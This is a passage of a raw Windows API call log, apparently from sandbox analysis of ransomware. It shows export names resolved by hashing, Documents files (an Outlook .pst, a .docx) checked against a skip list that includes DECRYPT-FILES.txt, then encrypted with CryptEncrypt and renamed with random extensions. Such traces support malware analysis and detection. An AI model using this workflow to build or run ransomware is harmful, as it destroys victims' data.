lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.301] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.301] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.301] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.301] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.301] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.301] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.301] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.301] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.301] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.301] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.301] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.301] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.301] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.301] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.301] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.301] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.301] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.301] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.301] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.302] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.302] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.302] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.302] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.302] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.302] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.302] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.302] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.302] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.302] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.302] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.302] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.302] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.302] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.302] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.302] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.302] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.303] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 76 [0084.303] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.8aBr9ft") returned 84 [0084.303] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.8aBr9ft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.8abr9ft"), dwFlags=0x0) returned 1 [0084.303] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.304] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.304] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.304] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0084.304] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0084.304] CloseHandle (hObject=0x410) returned 1 [0084.304] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9104500, ftCreationTime.dwHighDateTime=0x1d58036, ftLastAccessTime.dwLowDateTime=0x63d17ad0, ftLastAccessTime.dwHighDateTime=0x1d56b56, ftLastWriteTime.dwLowDateTime=0x63d17ad0, ftLastWriteTime.dwHighDateTime=0x1d56b56, nFileSizeHigh=0x0, nFileSizeLow=0x8bac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pvsZVe21XhXYV.docx", cAlternateFileName="PVSZVE~1.DOC")) returned 1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="autorun.inf") returned 1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="boot.ini") returned 1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="desktop.ini") returned 1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="ntuser.dat") returned 1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="iconcache.db") returned 1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="bootsect.bak") returned 1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="ntuser.dat.log") returned 1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="thumbs.db") returned -1 [0084.304] lstrcmpiW (lpString1="pvsZVe21XhXYV.docx", lpString2="Bootfont.bin") returned 1 [0084.305] lstrlenW (lpString="pvsZVe21XhXYV.docx") returned 18 [0084.305] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.305] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.305] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.305] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.305] lstrlenW (lpString="pvsZVe21XhXYV.docx") returned 18 [0084.305] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.305] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="pvsZVe21XhXYV.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx" [0084.305] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.305] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvszve21xhxyv.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.305] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=35756) returned 1 [0084.305] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.305] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.305] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.306] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.306] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.306] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.306] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.307] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.307] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.308] CloseHandle (hObject=0x414) returned 1 [0084.308] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.308] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.309] CloseHandle (hObject=0x0) returned 0 [0084.309] CloseHandle (hObject=0x410) returned 1 [0084.309] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.309] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.309] GetTickCount () returned 0x114d8a4 [0084.309] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.309] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.310] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.310] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.310] lstrlenA (lpString="kernel32.dll") returned 12 [0084.310] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.310] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.310] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.310] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.310] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.310] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.310] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.310] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.310] lstrlenA (lpString="ADDATOMA") returned 8 [0084.310] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.310] lstrlenA (lpString="ADDATOMW") returned 8 [0084.310] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.310] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.310] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.310] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.311] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.311] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.311] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.311] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.311] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.311] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.311] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.311] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.311] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.311] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.311] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.311] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.311] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.311] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.311] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.311] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.311] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.311] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.311] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.312] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.312] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.312] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.312] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.312] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.312] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.312] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.312] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.312] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.312] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.312] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.312] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.312] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.312] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.312] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.312] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.312] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.312] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.312] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.313] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.313] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.313] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.313] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.313] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.313] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.313] lstrlenA 